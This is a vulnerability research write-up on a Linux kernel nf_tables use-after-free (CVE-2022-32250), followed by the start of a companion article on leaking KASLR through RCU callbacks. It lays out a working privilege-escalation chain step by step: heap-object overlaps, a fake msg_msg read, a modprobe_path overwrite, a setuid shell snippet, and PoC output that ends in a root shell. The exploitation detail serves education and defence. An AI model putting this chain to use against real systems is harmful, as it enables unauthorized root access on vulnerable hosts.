	bool				invert;
	struct nft_set_binding		binding;
};

The parameter set holds a pointer to the set in which the lookup is going to be performed. sreg holds the register index where the key that we are looking up is going to be loaded from and dreg is the register index where value will be stored after the lookup if the key exists.
The final member is binding.
struct nft_set_binding {
	struct list_head		list;
	const struct nft_chain		*chain;
	u32				flags;
};

Each lookup expression has a binding which contains a pointer to the nft_chain to which it belongs (if it belongs to a chain). It also has a head to a linked list. All of the expressions that look up into a set are in a linked list with each other (and the set) through their bindings (and the set’s bindings member).

So if we have two lookup expressions lookup1 and lookup2 that look up into a set called set1 they would all be in a linked list.
/* In case needed for clarity:
set1.bindings.next = lookup1.binding
lookup1.binding.next = lookup2.binding
lookup2.binding.next = set1.bindings

lookup2.binding.prev = lookup1.binding
lookup1.binding.prev = set1.bindings
set1.bindings.prev = lookup2.binding
*/


The Vulnerability 

  A use-after-free vulnerability was found in the Linux kernel’s Netfilter subsystem in net/netfilter/nf_tables_api.c. This flaw allows a local attacker with user access to cause a privilege escalation issue.


Root Cause 
The problem arises when we add an nft_lookup expression to a set. To add a lookup expression to a set you have to use the NFT_MSG_NEWSET callback that calls the function nf_tables_newset.
nf_tables_newset
	nft_set_elem_expr_alloc
		nft_expr_init

nf_tables_newset calls nft_set_elem_expr_alloc which calls nft_expr_init.

Let’s take a deeper look at the nft_expr_init function.
static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
                      const struct nlattr *nla)
{
    struct nft_expr_info expr_info;
    struct nft_expr *expr;
    struct module *owner;
    int err;

    err = nf_tables_expr_parse(ctx, nla, &expr_info); 
    if (err < 0)
        goto err1;

    err = -ENOMEM;
    expr = kzalloc(expr_info.ops->size, GFP_KERNEL); // GFP_KERNEL space 
    if (expr == NULL)
        goto err2;

    err = nf_tables_newexpr(ctx, &expr_info, expr); // [1]
		// if the full intiatialization of the expression to a table: failed	
    if (err < 0) 
        goto err3; // free *expr

    return expr;
err3:
    kfree(expr);
err2:
    owner = expr_info.ops->type->owner;
    if (expr_info.ops->type->release_ops)
        expr_info.ops->type->release_ops(expr_info.ops);

    module_put(owner);
err1:
    return ERR_PTR(err);
}

At [1] it calls the function nf_tables_newexpr to fully initialize an expression. If that fails it frees the expresion.
static int nf_tables_newexpr(const struct nft_ctx *ctx,
                 const struct nft_expr_info *expr_info,
                 struct nft_expr *expr)
{
    const struct nft_expr_ops *ops = expr_info->ops;
    int err;

    expr->ops = ops; // sets the ops of the expression to those expr_info->ops;
    if (ops->init) {
				// does intialization
        err = ops->init(ctx, expr, (const struct nlattr **)expr_info->tb); // [2]
        if (err < 0)
            goto err1;
    }

    return 0;
err1:
    expr->ops = NULL;
    return err;
}

At [2] we see that the expression specific ops->init function gets called and if it fails it returns the error to the caller - nft_expr_init. 
Each type of expression has its own nft_expr_ops defined. Let’s take a look at the ops of the lookup expression as we are talking about it.
static const struct nft_expr_ops nft_lookup_ops = {
	.type		= &nft_lookup_type,
	.size		= NFT_EXPR_SIZE(sizeof(struct nft_lookup)),
	.eval		= nft_lookup_eval,
	.init		= nft_lookup_init,
	.activate	= nft_lookup_activate,
	.deactivate	= nft_lookup_deactivate,
	.destroy	= nft_lookup_destroy,
	.dump		= nft_lookup_dump,
	.validate	= nft_lookup_validate,
	.reduce		= nft_lookup_reduce,
};

Here we can see that ops->init of the lookup expression is nft_lookup_init.
static int nft_lookup_init(const struct nft_ctx *ctx,
               const struct nft_expr *expr,
               const struct nlattr * const tb[])
{
    struct nft_lookup *priv = nft_expr_priv(expr); 
    u8 genmask = nft_genmask_next(ctx->net);
    struct nft_set *set;
    u32 flags;
    int err;

    if (tb[NFTA_LOOKUP_SET] == NULL ||
        tb[NFTA_LOOKUP_SREG] == NULL)
        return -EINVAL;

		// sets up nft_set
    set = nft_set_lookup_global(ctx->net, ctx->table, tb[NFTA_LOOKUP_SET],
                    tb[NFTA_LOOKUP_SET_ID], genmask);
    if (IS_ERR(set))
        return PTR_ERR(set);

    ...
		// gets the flags 
    priv->binding.flags = set->flags & NFT_SET_MAP;

		// attempts to bind the expression to the set
    err = nf_tables_bind_set(ctx, set, &priv->binding); // [1]
    if (err < 0)
        return err;

    priv->set = set; 
    return 0;
}
int nf_tables_bind_set(const struct nft_ctx *ctx, struct nft_set *set,
               struct nft_set_binding *binding)
{
    struct nft_set_binding *i;
    struct nft_set_iter iter;

    if (set->use == UINT_MAX)
        return -EOVERFLOW;

    if (!list_empty(&set->bindings) && nft_set_is_anonymous(set))
        return -EBUSY;

    ...

bind:                          
    binding->chain = ctx->chain;
    list_add_tail_rcu(&binding->list, &set->bindings);
    nft_set_trans_bind(ctx, set);
    set->use++;

    return 0;
}

At [1] we can see that it calls the function nf_tables_bind_set to bind the expression to the set. In nf_tables_bind_set we can see that it fails if the bindings are not empty but the set is anonymous. So for the binding to succeed the set that we are performing the lookup at shouldn’t be anonymous.

  If we want a set to be non-anonymous we can just not set the anonymous flag when creating it.


We already established that when adding an expression to a set the nft_expr_init function gets called by nft_set_elem_expr_alloc. Let’s take a look at it.

struct nft_expr *nft_set_elem_expr_alloc(const struct nft_ctx *ctx,
                     const struct nft_set *set,
                     const struct nlattr *attr)
{
    struct nft_expr *expr;
    int err;

    expr = nft_expr_init(ctx, attr); // [1]
    if (IS_ERR(expr))
        return expr;

    err = -EOPNOTSUPP;
    if (!(expr->ops->type->flags & NFT_EXPR_STATEFUL)) // [2]
        goto err_set_elem_expr;

    if (expr->ops->type->flags & NFT_EXPR_GC) {
        if (set->flags & NFT_SET_TIMEOUT)
            goto err_set_elem_expr;
        if (!set->ops->gc_init)
            goto err_set_elem_expr;
        set->ops->gc_init(set);
    }

    return expr;

err_set_elem_expr:
    nft_expr_destroy(ctx, expr); // [3]
    return ERR_PTR(err);
}

void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr)
{
    nf_tables_expr_destroy(ctx, expr);
    kfree(expr);
}

static void nf_tables_expr_destroy(const struct nft_ctx *ctx,
                   struct nft_expr *expr)
{
    const struct nft_expr_type *type = expr->ops->type;

    if (expr->ops->destroy)
        expr->ops->destroy(ctx, expr); // [4]
    module_put(type->owner);
}

At [1] we can see the call to nft_expr_init that eventually results in the lookup expression being bound to the set. At [2] we can see that a check is performed to see if the flag NFT_EXPR_STATEFUL is present and if not it calls nft_expr_destroy. nft_expr_destroy itself calls nf_tables_expr_destroy which calls the expression-specific ops->destroy function.

Let’s look at the lookup expression’s destroy function - nft_lookup_destroy.
static void nft_lookup_destroy(const struct nft_ctx *ctx,
                   const struct nft_expr *expr)
{
    struct nft_lookup *priv = nft_expr_priv(expr);

    nf_tables_destroy_set(ctx, priv->set); // [1]
}

void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set)
{
    if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) // [2]
        nft_set_destroy(ctx, set); 
}

At [1] in nft_lookup_destroy a call is performed to nf_tables_destroy_set to destroy the set it bounded to if possible. At [2] a check is performed to see if it is safe to destroy the set - if the bindings are empty and the set is anonymous. However, the set won’t be destroyed if it is named or if has any bindings - and it will always have at least a single binding because the expression got bound to it prior to being destroyed.

So the problem is that in the function nft_set_elem_expr_alloc the call to nft_expr_init is performed before it is checked if the expression has the NFT_EXPR_STATEFUL flag. This means that if an expression without the stateful flag is passed, the expression will be initiated fully first and bound to the set before it gets destroyed because the flag is missing.

So what happens when we pass an expression without NFT_EXPR_STATEFUL? The expression will get bound to the set before the expression gets destroyed. However, the set that it is bound to won’t get destroyed because its bindings are not empty. And as we see in the functions above there is no handling in this case. The expression already got bound to the set and it will stay bound. A pointer to it will remain in the bindings linked list of the set even though the expression got destroyed and its memory got freed. So now the linked list at set->bindings contains a pointer to freed memory. A Use-After-Free arises.

Exploitation 
The way this vulnerability is exploited depends on the kernel version of the target. 
If the target is pre-version 5.14 there is just kmalloc- (KMALLOC_NORMAL) slab caches. After this version, there are two different types of caches - for accounted objects and unaccounted ones. Accounted objects are allocated using the flag GFP_KERNEL_ACCOUNT and they go to kmalloc-cg- (KMALLOC_CGROUP) caches. Unaccounted objects use the old flag GFP_KERNEL and go into the legacy kmalloc- caches. This is important as in later versions where separate caches are present for accounted and unaccounted objects, the nft_lookup expression is still unaccounted for, i.e. gets allocated with the flag GFP_KERNEL. Therefore in order to exploit the Use-After-Free vulnerability the objects that we are going to use as primitives must also be allocated with the GFP_KERNEL flag in versions that use the new kmalloc-cg- caches.

My goal was to write a version-agnostic exploit. To do that I only used objects that are still allocated with GFP_KERNEL even on newer versions. This way the exploit is viable with the older and newer cache implementations.

The exploit can be divided into three essential stages - leaking a heap address, leaking KASLR and overwriting modprobe_path to escalate our privileges.


  It’s important to note that the exploit was tested on 5.12.0 as this was what I had laying around. Version 5.12 is before kmalloc-cg- caches were introduced.


Requirements 
To be able to exploit the vulnerability you need CAP_NET_ADMIN. That shouldn’t be a problem in most cases as that capability can be obtained in a user+net namespace. So our only requirement is that we can create user and network namespaces.

Leaking a heap address 
It is essential to be able to leak a heap address as we are going to need one to successfully fool the kernel and bypass some security protections in the KASLR leaking stage but more on that later. Let’s now look into how we are going to leak the heap address.

We already established that the Use-After-Free occurs because we are left with a pointer to the binding of an nft_lookup expression that has been freed. 
Every expression in nf_tables is of the abstract type nft_expr.
/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */
struct nft_expr {
	const struct nft_expr_ops	*ops; // nft_lookup_ops in our case (8 bytes)
	unsigned char			data[] // this holds the nft_lookup object 
		__attribute__((aligned(__alignof__(u64)))); // aligned 8 bytes
};

struct nft_lookup {
	struct nft_set			*set; // @8 (8 bytes) 
	u8				sreg; // @16 (1 byte)
	u8				dreg; // @17 (1 byte)
	bool				invert; // @18 (also takes at east a byte)
	struct nft_set_binding		binding; // @24 (16 bytes)
	// @24 because 8-byte aligned because first member is a pointer
};

struct nft_set_binding {
	struct list_head		list; // @24; (2 pointers - 16 bytes)
	const struct nft_chain		*chain; // @40 (8 bytes)
	u32				flags; // @48 (4 bytes)
};


Here the data in nft_expr holds struct nft_lookup. The size of struct nft_expr whenever it holds an expression of type nft_lookup is 0x34 = 52 bytes. This indicates allocation in kmalloc-64. 
Therefore we are looking for primitives also in kmalloc-64 that are being allocated with GFP_KERNEL on versions with separate slab caches.

Method of Exploitation 
In order to leak a heap address we have to trigger the writing of a heap address into the freed memory object. That is trivially done by adding two nft_lookup expressions one after the other that target the same set. Let’s call those two lookup expressions Object 1 and Object 2.
As we already established, all the lookup expressions that target a certain set are in a linked list through their bindings. 
If we add a lookup expression without the NFT_EXPR_STATEFUL flag it will get bound to the set through its binding and then freed - this is our Object 1. Now if we add a second lookup expression (Object 2) that targets the same set it will also be added to the same linked list. Therefore now the set and both of these lookup expressions are in a linked list together. This means that the binding.next pointer of Object 1 is going to hold the address of the binding of Object 2. However, as we know Object 1 got freed prior to the allocation of Object 2. Therefore if we allocate an object we control (Fake Object 1) in the same space in memory where Object 1 got previously allocated now we have control over the memory where Object 1 is supposed to be. Consequently when Object 2 gets added the kernel thinks it is writing its address to the binding.next of Object 1 but in reality, it is writing it somewhere in the scope of Fake Object 1 that we control and can read from.

Important to mention here that the object we choose to allocate as Fake Object 1 must be kmalloc-64 and be allocated with GFP_KERNEL.

Summarizing:

  Allocate lookup expression (Object 1) without the NFT_EXPR_STATEFUL flag targetting  Set 1. It will get bound to the set and then freed.
  Initiate an object under our control (Fake Object 1) that will get allocated at the same memory allocation where Object 1 was allocated.
  Add another lookup expression (Object 2) that also targets Set 1. Now Object 1.binding and Object 2.binding are in a linked list. However Object 1 doesn’t exist anymore so actually the address of Object 2.binding is written in the scope of Fake Object 1.
  Read Fake Object 1 and leak the address of Object 2.


Now we established what our methodology for the heap leak is. Now it is time we find a primitive that we can use for Fake Object 1.

Searching for a primitive 
Objects used in the POSIX message queue filesystem have commonly been used as primitives due to the high degree of control we possess over them. For example, the msg_msg could have been a candidate here - we can control its size and reading memory with it is easy.
/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list; 
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

However, the header of msg_msg is six 8-byte words or 48 bytes. This means that binding.next won’t be overlapping with the readable section (the actual message section) but with m_type.
/* ipc/msgutil.c */
static struct msg_msg *alloc_msg(size_t len)
{
	struct msg_msg *msg;
	struct msg_msgseg **pseg;
	size_t alen;

	alen = min(len, DATALEN_MSG);
	msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT); // [1]
	...
	return msg;

out_err:
	free_msg(msg);
	return NULL;
}

At [1] we can see that msg_msg gets allocated with the flag GFP_KERNEL_ACCOUNT and that is another reason why it is not viable as a primitive.

struct user_key_payload 
A viable primitive was found in the face of user_key_payload. It belongs to the kernel’s key management facility. It holds the payload for keys of type user and logon.
/* include/keys/user-type.h */
struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */ // @0 - 16 bytes
	unsigned short	datalen;	/* length of this data */ // @16 - 2 bytes
	char		data[] __aligned(__alignof__(u64)); /* actual data */ // @24
};

/* include/linux/types.h
 * struct callback_head - callback structure for use with RCU and task_work
 * @next: next update requests in a list
 * @func: actual update function to call after the grace period.
 * ...
 */
struct callback_head {
	struct callback_head *next;
	void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

Let’s take a look at the function responsible for allocating user_key_payload.
/* security/keys/user_defined.c */
int user_preparse(struct key_preparsed_payload *prep)
{
	struct user_key_payload *upayload;
	size_t datalen = prep->datalen;

	if (datalen <= 0 || datalen > 32767 || !prep->data)
		return -EINVAL;

	upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL); // [1]
	if (!upayload)
		return -ENOMEM;

	/* attach the data */
	prep->quotalen = datalen;
	prep->payload.data[0] = upayload;
	upayload->datalen = datalen;
	memcpy(upayload->data, prep->data, datalen);
	return 0;
}
EXPORT_SYMBOL_GPL(user_preparse);

At [1] we can see that the allocation is performed with GFP_KERNEL flag therefore it is a viable primitive. Let’s take a look at how it overlaps with nft_expr[nft_lookup].
nft_expr that holds nft_lookup | user_key_payload
=================================================
0x0: *ops                      | rcu_head.next
0x8: *set                      | rcu_head.func
0x10: sreg/dreg/invert         | rcu_head.datalen
0x18: binding.next             | data[0]
0x20: binding.prev             | data[8]

We can see here that binding.next of nft_lookup overlaps with data[0] of user_key_payload. This suits our purposes as the value of binding.next will be written in data[0:8].

So now our exploitation strategy is:

  Add a lookup expression (Obj 1) so it gets bound and then freed.
  Add a user key (Fake Obj 1) with payload size such that it would get allocated in kmalloc-64 and where the UAF’d expression was.
  Add another lookup expression (Obj 2) that looks up into the same set. This would populate binding->next of Obj 1. However Obj 1 got UAF’d so the address of Obj 2 will get written into the data portion of Fake Obj 1 that is of type user_key_payload.
  Read Fake Obj 1 and leak the address of Obj 2.


Defeating KASLR 
After leaking a heap address our next goal is to leak a .text address to defeat KASLR. 
During this, stage we are going to be leveraging the message queue subsystem of the kernel as well as the in-kernel key management and retention facility.

Technique 
The technique we are going to use to defeat KASLR is explained in detail in my article Abusing RCU callbacks with a Use-After-Free read to defeat KASLR.

The technique in a nutshell as I introduce it in the article is:

  The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object while the second object must have a rcu_head as its first member.
If we make a call to update the second object the kernel will call call_rcu which will populate rcu_head->func(). Then if we can read OOB through the first object into the second object’s rcu_head without sleeping (as to not let the kernel execute rcu_head->func() which will free the memory and maybe zero it out if sensitive) we will be able to leak the address in rcu_head->func() therefore defeating KASLR.


Leaking an address 
We are going to trigger an allocation of an expression that gets UAF’d (Object 1). We make a call to the message queue subsystem to create a message queue. This will result in the allocation of a posix_msg_tree_node object (Fake Object 1). The posix_msg_tree_node has to be allocated at the same location where Object 1 that got UAF’d was allocated.
struct posix_msg_tree_node {
    struct rb_node      rb_node; // of size 0x18 = 24 bytes
    struct list_head    msg_list; // @24 (is 16 bytes)
    int         priority; // @40
};

struct rb_node {
    unsigned long  __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

The msg_head of poxis_msg_tree_node is at offset 24 = 0x18 bytes from the start - same as the list_head of the nft_set_binding of the nft_lookup expression.
nft_expr that holds nft_lookup | posix_msg_tree_node
====================================================
0x0: *ops                      | _rb_parent_color
0x8: *set                      | *rb_right
0x10: sreg/dreg/invert         | *rb_left
0x18: binding.next             | msg_list.next
0x20: binding.prev             | msg_list.prev

This would mean that the address of the binding of any new lookup expression will be written at offset 0x18 of the posix_msg_tree_node which is msg_list.next. This gives us a primitive with which we can fool the kernel that an object is a message (struct msg_msg) and fetch it - potentially leaking any addresses and pointers stored in the object.

  msg_msg gets allocated with GFP_KERNEL_ACCOUNT and therefore couldn’t be in the same slab cache (KMALLOC_NORMAL) as our nft_lookup expressions. However, that doesn’t stop us from fooling the kernel that an object that is in a KMALLOC_NORMAL cache is actually of type msg_msg - which is exactly what we are doing.


struct msg_msg {
	struct list_head m_list; // @0
	long m_type; // @16
	size_t m_ts;		/* message text size */ // @24
	struct msg_msgseg *next; // @32
	void *security; // @40
	/* the actual message follows immediately */
	/* the size can be up to 16 bytes while staying under 64 */
};

Looking at msg_msg we can see that the list_head of the object is right at the beginning of the object. This is in contrast to nft_expr[nft_lookup] where it is at offset 24 bytes. This is significant as the kernel believes that the address at posix_msg_tree_node.msg_list.next will be that of a msg_msg object (where the list_head is at the beginning). Instead, the kernel will find the address of an expression’s binding. Therefore the kernel will calculate incorrectly where the object starts resulting in an out-of-bounds read. This leaves us with an OOB read primitive that can be used to leak up to 16 bytes from the next slab object satisfying the first condition of the technique.
(Take a look at the table for clarity)

nft_expr[nft_lookup]   | msg_msg
======================================================
0x0: *ops              | 
0x8: *set              |
0x10: sreg/dreg/invert | 
0x18: binding.next     | m_list.next
0x20: binding.prev     | m_list.prev
0x28: ...              | m_type
0x30: ...              | m_ts
0x38: ...              | *next
======== Going outside the 64 byte slab object =======
0x40:                  | *security
0x48:                  | msg[0]
0x50:                  | msg[1]


As we already established: the second lookup expression (let it be called Object 2) we allocate will be treated as the first message in a message queue. However, to have a successful read via the message queue system - we need to be able to set the parameters of msg_msg. In order to do that we would need to UAF Object 2 and allocate another object in its place (Fake Object 2).
struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */
	unsigned short	datalen;	/* length of this data */
	char		data[] __aligned(__alignof__(u64)); /* actual data */
};

The type of Fake Object 2 will be once again user_key_payload as it gets allocated with  GFP_KERNEL and we can use it to write the parameters of the fake msg_msg by writing to data. This way we can set the m_type and m_ts of the fake message (we also have to write valid pointers into m_list->next and mlist->prev).

nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
======== End of Object 2 ; Object 3 follows ==========
0x8:                   |                  | *security
0x10:                  |                  | msg[0]
0x18:                  |                  | msg[1]

Here the first column represents the nft_lookup expression that gets UAF’d. The second column is the object that gets allocated over the object that got UAF’d while the third column shows how the kernel is going to treat the object (as a msg_msg object that is offset by 24 = 0x18 bytes).

Whenever a call to fetch a message is made the function do_mq_timedreceive gets called. At the end of the function as the msg_msg object is about to get freed a call to free msg_msg->security is made as a security measure - so in order for the message fetch to succeed there must be a valid heap address at offset 40=0x28 bytes. Therefore we need to take measures in ensuring that there is indeed a heap address at that location. We must also note that due to the nature of the OOB read the *security pointer would be at offset 64=0x40 bytes - right at the beginning of the next slab object as you can see above (this is due to the 24-byte offset read).

We are going to leak KASLR through the object we allocate right under Object 2 / Fake Object 2. A perfect object for this task is once again… user_key_payload - the main character of our write-up. 
The first member of user_key_payload is a rcu_head/callback_head.
struct callback_head {
	struct callback_head *next; // @0
	void (*func)(struct callback_head *head); // @8 rcu_head->func 
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

The first member of the callback_head is a pointer (callback_head->next) that will be treated as msg_msg->security and the second member is a function pointer that will overlap with msg[0]. Therefore if we make a call to read the message we will be able to read that function pointer and leak KASLR.

However, there is an issue: both callback_head->next and callback_head->func will be null by default. In order to populate them we must make a call to change the payload (Object 3). This is due to the way RCU callbacks work - when a call is made to change an RCU-protected object call_rcu is invoked.

  The call_rcu() API is a callback form of synchronize_rcu().  Instead of blocking, it registers a function and argument which are invoked after all ongoing RCU read-side critical sections have completed. This callback variant is particularly useful in situations where it is illegal to block or where update-side performance is critically important.


The function at callback_head->func will be executed by the kernel when it is safe to do so. In the case of updating a user_key_payload the callback function will be user_free_payload_rcu which will free and zero out Object 3.
static void user_free_payload_rcu(struct rcu_head *head)
{
	struct user_key_payload *payload;

	payload = container_of(head, struct user_key_payload, rcu);
	kfree_sensitive(payload);
}

So leaking callback_head->func is essentially a race against the kernel - trying to read it and leak it before the kernel zeroes it out.

I go over the technique in more detail in my article Abusing RCU callbacks with a Use-After-Free read to defeat KASLR.

Summarizing the KASLR leak process: 

  Allocate a nft_lookup expression (Object 1) such that it causes a UAF.
  Initiate a message queue in order to allocate a posix_msg_tree_node (Fake Object 1) at the location of Object 1.
  Spray user_key_payload objects and then randomly free a few to create a bunch of gaps in the cache so Object 2 gets allocated in between them.
  Add a new nft_lookup expression (Object 2) such that it causes a UAF. The address of this expression’s binding (which’s address is [Object 2] + 0x18) will be written into the msg_list->next of the poxis_msg_tree_node. Now if a message is fetched from the message queue the kernel will target [Object 2] + 0x18 to get the message (msg_msg). We also hope that this object would have been allocated such that the object immediately below it is a user_key_payload (and this is why we spray a lot of them in step 3).
  Allocate a user_key_payload (Fake Object 2) at the location of Object 2. Write into the payload the parameter values we want our fake msg_msg at [Object 2] + 0x18 to have. We write values for m_list->next, m_list->prev, m_type and m_ts.
  Mass update all the user_key_payload objects to populate the rcu_head members.
  Make a call to fetch the first message from a message queue. This should leak a kernel address, defeating KASLR (if we won the race against the kernel to leak rcu_head->func before it got zeroed out).


Escalating via a modprobe_path overwrite 
An easy way to achieve Local Priviliege Escalation is by overwriting the modprobe_path of the kernel.
modprobe is used to load kernel modules from userspace. A common usage of it is to load the necessary module needed to execute a binary with an uncommon binary header. 
The location of modprobe is stored in the modprobe_path symbol. It is possible for us to overwrite modprobe_path as it is stored in the .data segment (which is read/write and variables stored in there can be altered at run time).

Method of Exploitation 
Our goal is to write modprobe_path to an executable that we control - let’s call that fake_modprobe.

As we already established modprobe is executed in order to load a kernel module needed to handle the execution of a binary of an uncommon type. We can set up a trigger binary with an unknown binary header which when executed will force the kernel to execute modprobe in order to attempt to load an appropriate kernel module to handle trigger. But instead of modprobe being run, fake_modprobe will be executed with kernel privileges.

The fake_modprobe executable can be a simple script that changes the ownership of a get_shell executable to root and sets its SUID and GUID bits. In this case, get_shell just does:
setuid(0);
setgid(0);
system("/bin/sh");

The process summarized:

  Overwrite modprobe_path to /path/to/fake_modprobe
  Execute a trigger binary with an unknown binary header.
  The kernel executes fake_modprobe in an attempt to load the needed modules to execute trigger which instead changes the ownership and permissions of get_shell.
  Execute get_shell to escalate privileges.


Overwriting modprobe_path 
When a call to fetch a message is made the function do_mq_timedreceive gets executed which itself makes a call to msg_get to get the highest priority message from a queue.
static inline struct msg_msg *msg_get(struct mqueue_inode_info *info)
{
	struct rb_node *parent = NULL;
	struct posix_msg_tree_node *leaf;
	struct msg_msg *msg;

try_again:
	/*
	 * During insert, low priorities go to the left and high to the
	 * right.  On receive, we want the highest priorities first, so
	 * walk all the way to the right.
	 */
	parent = info->msg_tree_rightmost;
	if (!parent) {
		if (info->attr.mq_curmsgs) {
			pr_warn_once("Inconsistency in POSIX message queue, "
				     "no tree element, but supposedly messages "
				     "should exist!\n");
			info->attr.mq_curmsgs = 0;
		}
		return NULL;
	}
	leaf = rb_entry(parent, struct posix_msg_tree_node, rb_node);
	if (unlikely(list_empty(&leaf->msg_list))) {
		pr_warn_once("Inconsistency in POSIX message queue, "
			     "empty leaf node but we haven't implemented "
			     "lazy leaf delete!\n");
		msg_tree_erase(leaf, info);
		goto try_again;
	} else {
		msg = list_first_entry(&leaf->msg_list,
				       struct msg_msg, m_list);
		list_del(&msg->m_list); // [1] <---------------------
		if (list_empty(&leaf->msg_list)) {
			msg_tree_erase(leaf, info);
		}
	}
	info->attr.mq_curmsgs--;
	info->qsize -= msg->m_ts;
	return msg;
}

At [1] we can see that list_del is used to remove the message (msg_msg) from the linked list of messages in the queue.

list_del deletes a list entry by making the prev/next entries point to each other.
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
	next->prev = prev; // [1]
	WRITE_ONCE(prev->next, next); // [2]
}

The instruction at [1] will write prev into next+0x8 while the instruction at [2] will write next into prev.

We introduced in the KASLR bypass section of this write-up a way to fool the kernel that an object is a msg_msg - with the ability to set the members of the fake msg_msg to the values we want.
nft_expr[nft_lookup]   | user_key_payload | msg_msg
======================================================
0x0: *ops              | rcu.next         | 
0x8: *set              | rcu.func         |
0x10: sreg/dreg/invert | datalen          |
0x18: binding.next     | data[0]          | m_list.next
0x20: binding.prev     | data[1]          | m_list.prev
0x28: ...              | data[2]          | m_type
0x30: ...              | data[3]          | m_ts
0x38: ...              | data[4]          | *next
=====================================================
0x8:                   |                  | *security
0x10:                  |                  | msg[0]
0x18:                  |                  | msg[1]

We can use a user_key_payload object to set up the fake msg_msg exactly how we want it - including setting m_list.next and m_list.prev to any value we want. We can therefore take advantage of the list_del function - letting it write to modprobe_path for us. To do that we would need to set m_list.prev to the value we want modprobe_path to hold and set m_list.next to modprobe_path - 0x7 (as it writes prev into next+0x8 and we want to counteract this offsetting while still leaving the / at the beginning of the existing modprobe_path).

An interesting caveat though is that the value we write to m_list.prev (which is going to serve as the path written in modprobe_path) must be a valid address at which the kernel has to be able to write -  this however is not a problem as we leaked the heap base earlier and we can make such an address-like path that is valid.
// excerpt from my Proof-of-Concept
uint64_t modprobe_path = heap_base + 0x2f706d74; // 0x2f706d74 = tmp/ (but little endian)

This would result into modprobe_path being changed in /tmp/<2 bytes of entropy>\xff\xff (the 2 bytes of entropy here belong to the heap base we leaked).

Now it is a matter of placing the fake modprobe at this path and executing the trigger binary.

Proof-of-Concept 
The PoC is available at https://github.com/ysanatomic/CVE-2022-32250-LPE.

# ./exploit
[*] CVE-2022-32250 LPE Exploit by @YordanStoychev

uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] Setting up user+network namespace sandbox

uid=0(root) gid=0(root) groups=0(root)

[+] STAGE 1: Heap leak
[*] Socket is opened.
[*] Table table1 created.
[*] Socket is opened.
[*] Table table2 created.
[*] Socket is opened.
[*] Table table3 created.
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&] heap_addr: 0xffff91d97f89f398
[&] heap_base: 0xffff91d900000000

[+] STAGE 2: KASLR bypass
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created
[&] kaddr: 0xffffffff9f54bef0
[&] kbase: 0xffffffff9f000000

[+] STAGE 3: modprobe_path overwrite
[*] Set created
[*] Set with UAF'd expression created
[*] Set with UAF'd expression created

[*] STAGE 4: Escalation
[*] Setting up the fake modprobe...
[*] modprobe_path: /tmp/ّprobe
[*] Setting up the shell...
[*] Triggering the modprobe...
[*] Executing shell...
/ #


Closing Remarks 
Analysing and Exploiting this vulnerability was lots of fun. Initially, I planned to do everything from analysing it to making the exploit live on stream but I started doing more and more off-stream and then I just finished it up off-stream. I might make one last stream/video where I go over the final exploit in detail.

Took me some time to sit down and finish up the write-up - but better late than never.

If you have any questions feel free to hit me up on Twitter or by email.


Abusing RCU callbacks with a Use-After-Free read to defeat KASLR
2023-01-04T14:00:00+00:00
Introduction
In this article, I will be walking you through a clever technique that can be used to leak addresses and defeat KASLR in the Linux Kernel when you have a certain type of Use-After-Free by abusing RCU callbacks. It is by no means a novel technique and has most likely been leveraged in several exploits.

This is a guide meant to give you a solid understanding of the technique as quickly as possible.

  This article was supposed to come out 2 weeks ago but it was delayed due to the Christmas holidays.


Table of Contents

  The Technique in a nutshell
  Criteria
    
      A certain type of Use-After-Free
      A specific OOB read
      Ability to spray objects
    
  
  Analysis
    
      Reading Primitive
        
          user_key_payload
          posix_msg_tree_node
          msg_msg
        
      
      Frankensteining everything together
    
  
  Resources
  Summary


The Technique in a nutshell 
The technique is possible when we control two objects allocated next to each other in the same slab cache. We must be able to read out-of-bounds through the first object while the second object must have a rcu_head as its first member.

If we make a call to update the second object the kernel will call call_rcu which will populate rcu_head->func(). Then if we can read OOB through the first object into the second object’s rcu_head without sleeping (as to not let the kernel execute rcu_head->func() which will free the memory and maybe zero it out if sensitive) we will be able to leak the address in rcu_head->func() therefore defeating KASLR.

Now that we have a general summary of the technique it is time to go more in-depth.

Criteria 
We have some criteria that have to be met to be able to use this technique.

A certain type of Use-After-Free 
This technique applies to objects that meet the following requirements:

  The object that gets UAF’d must be in a linked list.
  The list_head of the object must be at offset 16 bytes or more relative to the start of the object.
  You must be able to get multiple objects that get UAF’d in a linked list with one another.


A specific OOB read 
We need to have a primitive capable of reading at least 16 bytes out-of-bounds for the slab object. However, it is important to mention that read sizes cannot go over the size limit of the slab cache. So if you are reading from an object in kmalloc-64 you can read up to 64 bytes before the kernel detects the memory leak if the option CONFIG_HARDENED_USERCOPY is on (and chances are it is on the target). This means that your read needs to start at offset 16 bytes from the start of the slab object to be able to read 16 bytes out-of-bounds.


  Ex: If you have a kmalloc-64 slab object that occupies the address space from address 0x20 to address 0x60 your read must start at offset 0x30 to be able to read 16 bytes out-of-bounds for the slab object (up to 0x70).


